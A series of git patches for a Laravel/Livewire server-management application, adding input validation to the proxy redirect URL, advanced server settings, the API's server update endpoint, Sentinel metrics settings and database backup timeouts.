+ "{$field}.regex" => 'Port mappings must be a comma-separated list of port pairs or ranges (e.g. 3000:3000,8080:80,8000-8010:8000-8010).',
+ ];
+ }
+
/**
* Check if a string is a valid Docker container name.
*/
From 73258c317e3d79aefb90924d5319ddc54209eebc Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 00:34:32 +0530
Subject: [PATCH 106/168] fix(validation): add URL validation for proxy
redirect input
---
app/Livewire/Server/Proxy.php | 12 +++++++++---
1 file changed, 9 insertions(+), 3 deletions(-)
diff --git a/app/Livewire/Server/Proxy.php b/app/Livewire/Server/Proxy.php
index d5f30fca0..c2d8205ef 100644
--- a/app/Livewire/Server/Proxy.php
+++ b/app/Livewire/Server/Proxy.php
@@ -6,6 +6,7 @@
use App\Actions\Proxy\SaveProxyConfiguration;
use App\Enums\ProxyTypes;
use App\Models\Server;
+use App\Rules\SafeExternalUrl;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use Livewire\Component;
@@ -41,9 +42,13 @@ public function getListeners()
];
}
- protected $rules = [
- 'generateExactLabels' => 'required|boolean',
- ];
+ protected function rules()
+ {
+ return [
+ 'generateExactLabels' => 'required|boolean',
+ 'redirectUrl' => ['nullable', new SafeExternalUrl],
+ ];
+ }
public function mount()
{
@@ -147,6 +152,7 @@ public function submit()
{
try {
$this->authorize('update', $this->server);
+ $this->validate();
SaveProxyConfiguration::run($this->server, $this->proxySettings);
$this->server->proxy->redirect_url = $this->redirectUrl;
$this->server->save();
From c52a199120d2d06e2a473305734643f2bd66ead1 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 01:14:08 +0530
Subject: [PATCH 107/168] fix(validation): add input validation for server
advanced settings page
---
app/Http/Controllers/Api/ServersController.php | 18 +++++++++++++++++-
app/Livewire/Server/Advanced.php | 16 ++++++++--------
.../views/livewire/server/advanced.blade.php | 4 ++++
3 files changed, 29 insertions(+), 9 deletions(-)
diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index 2ef95ce8b..930879d80 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -598,6 +598,11 @@ public function create_server(Request $request)
'is_build_server' => ['type' => 'boolean', 'description' => 'Is build server.'],
'instant_validate' => ['type' => 'boolean', 'description' => 'Instant validate.'],
'proxy_type' => ['type' => 'string', 'enum' => ['traefik', 'caddy', 'none'], 'description' => 'The proxy type.'],
+ 'concurrent_builds' => ['type' => 'integer', 'description' => 'Number of concurrent builds.'],
+ 'dynamic_timeout' => ['type' => 'integer', 'description' => 'Deployment timeout in seconds.'],
+ 'deployment_queue_limit' => ['type' => 'integer', 'description' => 'Maximum number of queued deployments.'],
+ 'server_disk_usage_notification_threshold' => ['type' => 'integer', 'description' => 'Server disk usage notification threshold (%).'],
+ 'server_disk_usage_check_frequency' => ['type' => 'string', 'description' => 'Cron expression for disk usage check frequency.'],
],
),
),
@@ -634,7 +639,7 @@ public function create_server(Request $request)
)]
public function update_server(Request $request)
{
- $allowedFields = ['name', 'description', 'ip', 'port', 'user', 'private_key_uuid', 'is_build_server', 'instant_validate', 'proxy_type'];
+ $allowedFields = ['name', 'description', 'ip', 'port', 'user', 'private_key_uuid', 'is_build_server', 'instant_validate', 'proxy_type', 'concurrent_builds', 'dynamic_timeout', 'deployment_queue_limit', 'server_disk_usage_notification_threshold', 'server_disk_usage_check_frequency'];
$teamId = getTeamIdFromToken();
if (is_null($teamId)) {
@@ -655,6 +660,11 @@ public function update_server(Request $request)
'is_build_server' => 'boolean|nullable',
'instant_validate' => 'boolean|nullable',
'proxy_type' => 'string|nullable',
+ 'concurrent_builds' => 'integer|nullable|min:1',
+ 'dynamic_timeout' => 'integer|nullable|min:1',
+ 'deployment_queue_limit' => 'integer|nullable|min:1',
+ 'server_disk_usage_notification_threshold' => 'integer|nullable|min:1|max:100',
+ 'server_disk_usage_check_frequency' => 'string|nullable',
]);
$extraFields = array_diff(array_keys($request->all()), $allowedFields);
@@ -691,6 +701,12 @@ public function update_server(Request $request)
'is_build_server' => $request->is_build_server,
]);
}
+
+ $advancedSettings = $request->only(['concurrent_builds', 'dynamic_timeout', 'deployment_queue_limit', 'server_disk_usage_notification_threshold', 'server_disk_usage_check_frequency']);
+ if (! empty($advancedSettings)) {
+ $server->settings()->update(array_filter($advancedSettings, fn ($value) => ! is_null($value)));
+ }
+
if ($request->instant_validate) {
ValidateServer::dispatch($server);
}
diff --git a/app/Livewire/Server/Advanced.php b/app/Livewire/Server/Advanced.php
index dba1b4903..0e1a9a325 100644
--- a/app/Livewire/Server/Advanced.php
+++ b/app/Livewire/Server/Advanced.php
@@ -15,17 +15,17 @@ class Advanced extends Component
#[Validate(['string'])]
public string $serverDiskUsageCheckFrequency = '0 23 * * *';
- #[Validate(['integer', 'min:1', 'max:99'])]
- public int $serverDiskUsageNotificationThreshold = 50;
+ #[Validate(['required', 'integer', 'min:1', 'max:99'])]
+ public ?int $serverDiskUsageNotificationThreshold = 50;
- #[Validate(['integer', 'min:1'])]
- public int $concurrentBuilds = 1;
+ #[Validate(['required', 'integer', 'min:1'])]
+ public ?int $concurrentBuilds = 1;
- #[Validate(['integer', 'min:1'])]
- public int $dynamicTimeout = 1;
+ #[Validate(['required', 'integer', 'min:1'])]
+ public ?int $dynamicTimeout = 1;
- #[Validate(['integer', 'min:1'])]
- public int $deploymentQueueLimit = 25;
+ #[Validate(['required', 'integer', 'min:1'])]
+ public ?int $deploymentQueueLimit = 25;
public function mount(string $server_uuid)
{
diff --git a/resources/views/livewire/server/advanced.blade.php b/resources/views/livewire/server/advanced.blade.php
index 33086aea1..f6610c1d5 100644
--- a/resources/views/livewire/server/advanced.blade.php
+++ b/resources/views/livewire/server/advanced.blade.php
@@ -22,6 +22,7 @@
id="serverDiskUsageCheckFrequency" label="Disk usage check frequency" required
helper="Cron expression for disk usage check frequency.
You can use every_minute, hourly, daily, weekly, monthly, yearly.
Default is every night at 11:00 PM." />
@@ -31,12 +32,15 @@
Builds
From 15a98b52c93746e54bd40812f0a9f8c0229a5457 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 01:24:08 +0530
Subject: [PATCH 108/168] fix(validation): add input validation for
server_disk_usage_check_frequency on API
---
app/Http/Controllers/Api/ServersController.php | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index 930879d80..beba33a8c 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -702,6 +702,13 @@ public function update_server(Request $request)
]);
}
+ if ($request->has('server_disk_usage_check_frequency') && ! validate_cron_expression($request->server_disk_usage_check_frequency)) {
+ return response()->json([
+ 'message' => 'Validation failed.',
+ 'errors' => ['server_disk_usage_check_frequency' => ['Invalid Cron / Human expression for Disk Usage Check Frequency.']],
+ ], 422);
+ }
+
$advancedSettings = $request->only(['concurrent_builds', 'dynamic_timeout', 'deployment_queue_limit', 'server_disk_usage_notification_threshold', 'server_disk_usage_check_frequency']);
if (! empty($advancedSettings)) {
$server->settings()->update(array_filter($advancedSettings, fn ($value) => ! is_null($value)));
From 1ebba7da3acccf7e0cb1cf740ec531637895276b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 01:52:19 +0530
Subject: [PATCH 109/168] fix(validation): add input validation for sentinel
configuration
---
app/Livewire/Server/Sentinel.php | 6 +++---
resources/views/livewire/server/sentinel.blade.php | 7 ++++---
2 files changed, 7 insertions(+), 6 deletions(-)
diff --git a/app/Livewire/Server/Sentinel.php b/app/Livewire/Server/Sentinel.php
index dff379ae1..a4b35891b 100644
--- a/app/Livewire/Server/Sentinel.php
+++ b/app/Livewire/Server/Sentinel.php
@@ -25,13 +25,13 @@ class Sentinel extends Component
public ?string $sentinelUpdatedAt = null;
#[Validate(['required', 'integer', 'min:1'])]
- public int $sentinelMetricsRefreshRateSeconds;
+ public int|string $sentinelMetricsRefreshRateSeconds;
#[Validate(['required', 'integer', 'min:1'])]
- public int $sentinelMetricsHistoryDays;
+ public int|string $sentinelMetricsHistoryDays;
#[Validate(['required', 'integer', 'min:10'])]
- public int $sentinelPushIntervalSeconds;
+ public int|string $sentinelPushIntervalSeconds;
#[Validate(['nullable', 'url'])]
public ?string $sentinelCustomUrl = null;
diff --git a/resources/views/livewire/server/sentinel.blade.php b/resources/views/livewire/server/sentinel.blade.php
index 4016a30e4..5ca535cbc 100644
--- a/resources/views/livewire/server/sentinel.blade.php
+++ b/resources/views/livewire/server/sentinel.blade.php
@@ -91,13 +91,14 @@
-
-
-
From 791aa10b3fed851df81192538f2aa15144eb179b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 02:24:36 +0530
Subject: [PATCH 110/168] fix(validation): use int|string for Livewire numeric
properties and remove nullable from API rules
---
app/Http/Controllers/Api/ServersController.php | 10 +++++-----
app/Livewire/Server/Advanced.php | 8 ++++----
2 files changed, 9 insertions(+), 9 deletions(-)
diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index beba33a8c..c13c6665c 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -660,11 +660,11 @@ public function update_server(Request $request)
'is_build_server' => 'boolean|nullable',
'instant_validate' => 'boolean|nullable',
'proxy_type' => 'string|nullable',
- 'concurrent_builds' => 'integer|nullable|min:1',
- 'dynamic_timeout' => 'integer|nullable|min:1',
- 'deployment_queue_limit' => 'integer|nullable|min:1',
- 'server_disk_usage_notification_threshold' => 'integer|nullable|min:1|max:100',
- 'server_disk_usage_check_frequency' => 'string|nullable',
+ 'concurrent_builds' => 'integer|min:1',
+ 'dynamic_timeout' => 'integer|min:1',
+ 'deployment_queue_limit' => 'integer|min:1',
+ 'server_disk_usage_notification_threshold' => 'integer|min:1|max:100',
+ 'server_disk_usage_check_frequency' => 'string',
]);
$extraFields = array_diff(array_keys($request->all()), $allowedFields);
diff --git a/app/Livewire/Server/Advanced.php b/app/Livewire/Server/Advanced.php
index 0e1a9a325..b39da5e5a 100644
--- a/app/Livewire/Server/Advanced.php
+++ b/app/Livewire/Server/Advanced.php
@@ -16,16 +16,16 @@ class Advanced extends Component
public string $serverDiskUsageCheckFrequency = '0 23 * * *';
#[Validate(['required', 'integer', 'min:1', 'max:99'])]
- public ?int $serverDiskUsageNotificationThreshold = 50;
+ public int|string $serverDiskUsageNotificationThreshold = 50;
#[Validate(['required', 'integer', 'min:1'])]
- public ?int $concurrentBuilds = 1;
+ public int|string $concurrentBuilds = 1;
#[Validate(['required', 'integer', 'min:1'])]
- public ?int $dynamicTimeout = 1;
+ public int|string $dynamicTimeout = 1;
#[Validate(['required', 'integer', 'min:1'])]
- public ?int $deploymentQueueLimit = 25;
+ public int|string $deploymentQueueLimit = 25;
public function mount(string $server_uuid)
{
From 67f8eb929f5655a71263c99c2c05a27654a8868b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 02:48:32 +0530
Subject: [PATCH 111/168] fix(validation): add input validation for database
backup timeout
---
app/Livewire/Project/Database/BackupEdit.php | 2 +-
.../project/database/backup-edit.blade.php | 18 +++++++++---------
2 files changed, 10 insertions(+), 10 deletions(-)
diff --git a/app/Livewire/Project/Database/BackupEdit.php b/app/Livewire/Project/Database/BackupEdit.php
index 0fff2bd03..a18022882 100644
--- a/app/Livewire/Project/Database/BackupEdit.php
+++ b/app/Livewire/Project/Database/BackupEdit.php
@@ -76,7 +76,7 @@ class BackupEdit extends Component
public bool $dumpAll = false;
#[Validate(['required', 'int', 'min:60', 'max:36000'])]
- public int $timeout = 3600;
+ public int|string $timeout = 3600;
public function mount()
{
diff --git a/resources/views/livewire/project/database/backup-edit.blade.php b/resources/views/livewire/project/database/backup-edit.blade.php
index bb5dcfc4d..d5c25916a 100644
--- a/resources/views/livewire/project/database/backup-edit.blade.php
+++ b/resources/views/livewire/project/database/backup-edit.blade.php
@@ -81,10 +81,10 @@
@endif
-
+
-
+ helper="The timezone of the server where the backup is scheduled to run (if not set, the instance timezone will be used)" required />
+
Backup Retention Settings
@@ -101,13 +101,13 @@
+ helper="Keeps only the specified number of most recent backups on the server. Set to 0 for unlimited backups." required />
+ helper="Automatically removes backups older than the specified number of days. Set to 0 for no time limit." required />
+ helper="When total size of all backups in the current backup job exceeds this limit in GB, the oldest backups will be removed. Decimal values are supported (e.g. 0.001 for 1MB). Set to 0 for unlimited storage." required />